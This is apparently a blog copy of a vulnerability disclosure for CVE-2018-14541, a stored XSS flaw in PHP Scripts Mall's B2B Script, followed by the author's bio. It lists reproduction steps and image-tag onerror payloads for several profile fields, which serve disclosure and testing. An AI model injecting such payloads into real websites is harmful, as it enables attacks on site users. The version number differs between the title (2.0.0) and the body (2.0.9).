CVE-2018-14541 : PHP Scripts Mall Basic B2B Script 2.0.0 has Reflected and Stored XSS Vulnerability

CVE-2018-14541-Vikas Chaudhary

# Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.9 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
# Date: 20.07.2018
# Site Titel : B2B Script
# Vendor Homepage:
#Vendor Software :
# Software Link:
# Category: Web Application
# Version: 2.0.9
# Exploit Author: Vikas Chaudhary
# Contact:
# Web:
#Published on :
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-14541

Proof of Concept:-
1. Go to the site ( ) ,Select User Demo.
2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on …
3- Goto your mail and Verify it.
4-Come back to site and Login using your Verified Mail and Password.
6- When loged in ,goto My Profile => Edit Profile and fill the these Scripts in given parameter.

in FIRST NAME => “><img src=x onerror=prompt(/VIKAS/)>
in LAST NAME => “><img src=x onerror=prompt(/CHAUDHARY/)>
in ADDRESS 1 => “><img src=x onerror=prompt(/MYAIM/)>
in ADDRESS 2 => “><img src=x onerror=prompt(/GKAIM/)>
in CITY => “><img src=x onerror=prompt(/HRDP/)>
in STATE => “><img src=x onerror=prompt(/ETHICAL/)>
in COMPANY NAME => “><img src=x onerror=prompt(/HACKER/)>

Now click on SUBMIT and refresh the page

You will having popup of /VIKAS/ , /CHAUDHARY/ , / MYAIM/ . /GKAIM/ , /HRDP/ , /ETHICAL/ , /HACKER/ in you account..

Myself Vikash Chaudhary, I was interested in general knowledge since childhood, so I thought why not share my knowledge with you, that's why I created this educational blog. I am a Youtuber, Author, Blogger, Trader, Freelancer, and Security Analyst. I have experience of 7 years in Blogging and Trading. I have written 3 books which you can find on this website.Keep Loving and Supporting... Thank you.